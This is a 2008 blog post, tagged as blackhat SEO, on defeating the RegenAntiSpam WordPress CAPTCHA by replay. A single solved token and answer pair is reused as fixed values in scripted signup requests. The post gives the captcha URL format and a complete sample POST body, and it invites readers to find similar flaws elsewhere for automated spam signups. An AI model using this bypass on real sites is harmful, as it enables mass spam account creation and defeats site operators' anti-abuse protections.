Captcha Breaking can be so easy
Written on 18. November 2008 – 21:13 | by admin
Really why bother using difficult methodes like OCR with neural networks when it could all be so easy. Of course there are really (well kind of) *secure* captcha implementations, but lets face the facts – most of the current captcha systems have basic design flaws which allows us to bypass the captcha test or just decode the requested result by reversing the captcha generation algorythm like it was done with the pligg captcha. This is not as hard as it may sound if you look at the source of for example RegenAntiSpam which we use as example now, as it has a really basic design flaw that gives us the possibility to re-use a solved captcha over and over again, even on random websites. The RegenAntiSpam captcha is generated with a token that is supplied by the website and will be sent along with the solved captcha text in the POST request to the signup form.
Lets have a look at the captcha url:
http://blog.tld/wp-content/plugins/captcha.php/?token=jo26gz
So here we have the Token that is used to identify the captcha. Now all you have to do is to solve one captcha and save the token aswell as the result text. Then sniff out the HTTP POST request so you can built your own submission script and just add the token and solved text as static value. Yes, belive it or not, it will work. Its really that simple.
For wordpress this would look like:
stage=validate-user-signup&user_name=fsddsf&user_email=fdsfds%40fsdfds.com&spamCode=fb9f7c&mcode=jo26gz&signup_for=blog&chkread=&submit=Next+%C2%BB
Obviously spamCode and mcode will be used as static value in each request. This is just one example of a basic design flaw in a certain captcha implementation. I’m sure you can spot more out there 
Tags: Blackhat SEO, captcha, captcha-breakin, captcha-bypass, token
